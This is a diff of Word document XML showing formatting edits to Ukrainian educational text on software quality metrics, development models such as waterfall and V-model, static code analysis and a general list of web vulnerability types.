-        <w:t>відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду. Від того, які бази використовуються в аналізаторі, безпосередньо залежить якість проведення аналізу, кількість помилкових спрацьовувань і пропущених помилок. Крім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраструктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продуктів.</w:t>
+        <w:t>відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Від того, які бази використовуються в аналізаторі, безпосередньо залежить якість проведення аналізу, кількість помилкових спрацьовувань і пропущених помилок. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Кр</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраструктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продукті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23304,6 +25285,7 @@
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -23312,7 +25294,18 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Підтримка</w:t>
+        <w:t>П</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ідтримка</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -23412,7 +25405,59 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> містить перелік вразливостей, відсортованих за ступенем їх небезпеки (на першому місці найнебезпечніший тип вразливостей). Список не включає в себе всі можливі типи вразливостей, крім того, часто буває, що ту чи іншу вразливість можна віднести відразу до декількох категорій.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>містить</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> перелік вразливостей, відсортованих за ступенем їх небезпеки (на першому місці найнебезпечніший тип вразливостей). Список не включає в себе всі можливі типи вразливостей, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>кр</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ім того, часто буває, що ту чи іншу вразливість можна віднести відразу до декількох категорій.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24408,7 +26453,31 @@
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>7. Відсутність контролю доступу до функціонального рівня</w:t>
+        <w:t xml:space="preserve">7. Відсутність контролю доступу до функціонального </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>івня</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24456,7 +26525,55 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>-додатком, можуть мати різні рівні повноважень. У таких випадках базова аутентифікація може не впоратися з тим, щоб не допустити використання користувачами повноважень, функцій і даних, доступ до яких їм заборонено.</w:t>
+        <w:t xml:space="preserve">-додатком, можуть мати </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізні рівні повноважень. У </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>таких</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> випадках базова аутентифікація може не впоратися з тим, щоб не допустити використання користувачами повноважень, функцій і даних, доступ до яких їм заборонено.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24504,7 +26621,31 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> обліковий запис з недостатніми привілеями, може спробувати отримати доступ до закритих функціями (і даними), підбираючи виклики до них.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>обл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>іковий запис з недостатніми привілеями, може спробувати отримати доступ до закритих функціями (і даними), підбираючи виклики до них.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27200,6 +29341,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -27208,7 +29350,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Для прикладу було викоористано </w:t>
+        <w:t>Для</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> прикладу було викоористано </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -30999,7 +33152,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BBDDF6DF-EB1A-4399-AD6C-2C05EBC251BD}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{084E5DCB-7262-45B8-8DAE-B6938E67D7FA}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -327,41 +327,30 @@
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37303ED9" wp14:editId="68C60726">
-            <wp:extent cx="5940425" cy="4942895"/>
-            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
-            <wp:docPr id="1" name="Рисунок 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5940425" cy="4942895"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
+        <w:pict>
+          <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+            <v:stroke joinstyle="miter"/>
+            <v:formulas>
+              <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+              <v:f eqn="sum @0 1 0"/>
+              <v:f eqn="sum 0 0 @1"/>
+              <v:f eqn="prod @2 1 2"/>
+              <v:f eqn="prod @3 21600 pixelWidth"/>
+              <v:f eqn="prod @3 21600 pixelHeight"/>
+              <v:f eqn="sum @0 0 1"/>
+              <v:f eqn="prod @6 1 2"/>
+              <v:f eqn="prod @7 21600 pixelWidth"/>
+              <v:f eqn="sum @8 21600 0"/>
+              <v:f eqn="prod @7 21600 pixelHeight"/>
+              <v:f eqn="sum @10 21600 0"/>
+            </v:formulas>
+            <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+            <o:lock v:ext="edit" aspectratio="t"/>
+          </v:shapetype>
+          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:468pt;height:378.75pt">
+            <v:imagedata r:id="rId7" o:title="Waterfall"/>
+          </v:shape>
+        </w:pict>
       </w:r>
     </w:p>
     <w:p>
@@ -518,41 +507,11 @@
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B9FFE90" wp14:editId="622AA9D2">
-            <wp:extent cx="5940425" cy="4811689"/>
-            <wp:effectExtent l="0" t="0" r="3175" b="8255"/>
-            <wp:docPr id="2" name="Рисунок 2"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5940425" cy="4811689"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
+        <w:pict>
+          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:468pt;height:378.75pt">
+            <v:imagedata r:id="rId8" o:title="Waterfall main"/>
+          </v:shape>
+        </w:pict>
       </w:r>
     </w:p>
     <w:p>
@@ -3041,41 +3000,11 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D34EFBD" wp14:editId="6829F3FB">
-            <wp:extent cx="4752975" cy="2724150"/>
-            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-            <wp:docPr id="3" name="Рисунок 3"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4752975" cy="2724150"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
+        <w:pict>
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:438pt;height:270pt">
+            <v:imagedata r:id="rId9" o:title="V-model"/>
+          </v:shape>
+        </w:pict>
       </w:r>
     </w:p>
     <w:p>
@@ -3183,7 +3112,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Фази V-подібної моделі</w:t>
       </w:r>
     </w:p>
@@ -3440,7 +3368,17 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>системне і приймальне тестування - виконується перевірка функціонування програмної системи в цілому (повністю інтегрована система), після приміщенні в її апаратне середовище відповідно до спеціфікацией вимог до ПО.</w:t>
+        <w:t xml:space="preserve">системне і приймальне тестування - виконується перевірка функціонування програмної системи в цілому (повністю інтегрована </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>система), після приміщенні в її апаратне середовище відповідно до спеціфікацией вимог до ПО.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3465,7 +3403,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>виробництво, експлуатація та супровід - ПО запускається у виробництво. На цій фазі передбачені також модернізації та внесення поправок;</w:t>
       </w:r>
     </w:p>
@@ -3721,7 +3658,17 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>ак як в даному випадку цілком можливо скористатися тимчасовою шкалою, а завершення кожної фази є контрольною точкою;</w:t>
+        <w:t xml:space="preserve">ак як в даному випадку цілком можливо скористатися </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>тимчасовою шкалою, а завершення кожної фази є контрольною точкою;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3746,7 +3693,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>модель проста у використанні (щодо проекту, для якого вона є прийнятною).</w:t>
       </w:r>
     </w:p>
@@ -4139,28 +4085,53 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:strike/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Розвиненіша коштів, призначених</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> для досягнення високої якості програмного забезпечення, які передбачають адаптацію наявних і створення нових ручних і автоматичних процедур, що дозволяють </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">контролювати </w:t>
+        <w:t>Розви</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ток</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>засобів</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, призначених</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> для досягнення високої якості програмного забезпечення, які передбачають адаптацію наявних і створення нових ручних і автоматичних процедур, що дозволяють контролювати </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -4522,7 +4493,17 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">язана з характеристиками ПЗ самого по собі, без урахування його поведінки, зовнішньої якості, що характеризує ПЗ з точки зору його поведінки, та якості ПЗ при використанні в різних умовах – та якість, яку відчуває користувач за конкретних сценаріїв роботи ПЗ. Для всіх цих поглядів на якість було введено метрики, які дозволяють оцінити його. Також при розробці якісного ПЗ важливою є якість технологічних процесів його розробки. Відношення між цими складовими якості по схемі, прийнятій в </w:t>
+        <w:t xml:space="preserve">язана з характеристиками ПЗ самого по собі, без урахування його поведінки, зовнішньої якості, що характеризує ПЗ з точки зору його поведінки, та якості ПЗ при використанні в різних умовах – та якість, яку відчуває користувач за конкретних сценаріїв роботи ПЗ. Для всіх цих поглядів на якість було введено метрики, які дозволяють оцінити його. Також </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">при розробці якісного ПЗ важливою є якість технологічних процесів його розробки. Відношення між цими складовими якості по схемі, прийнятій в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4569,7 +4550,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69A4368A" wp14:editId="5BCD4584">
             <wp:extent cx="5000625" cy="2089414"/>
@@ -4814,6 +4794,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Рисунок 1.2. </w:t>
       </w:r>
       <w:r>
@@ -4908,7 +4889,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Функціональність (functionality). Здатність ПЗ в певних умовах вирішувати завдання, потрібні користувачам. Визнача</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -5286,6 +5266,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Зручність використання (usability) або практичність. Здатність ПЗ бути зручним в навчанні і використанні, а також привабливим для користувачів.</w:t>
       </w:r>
     </w:p>
@@ -5309,7 +5290,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Зрозумілість (understandability). Показник, зворотний до зусиль, витрачених користувачами, щоб сприйняти набі</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -5570,8 +5550,18 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>аналізований (analyzability) або зручність проведення аналізу. Зручність проведення аналізу помилок, дефектів і недолі</w:t>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>З</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ручність проведення аналізу. Зручність проведення аналізу помилок, дефектів і недолі</w:t>
       </w:r>
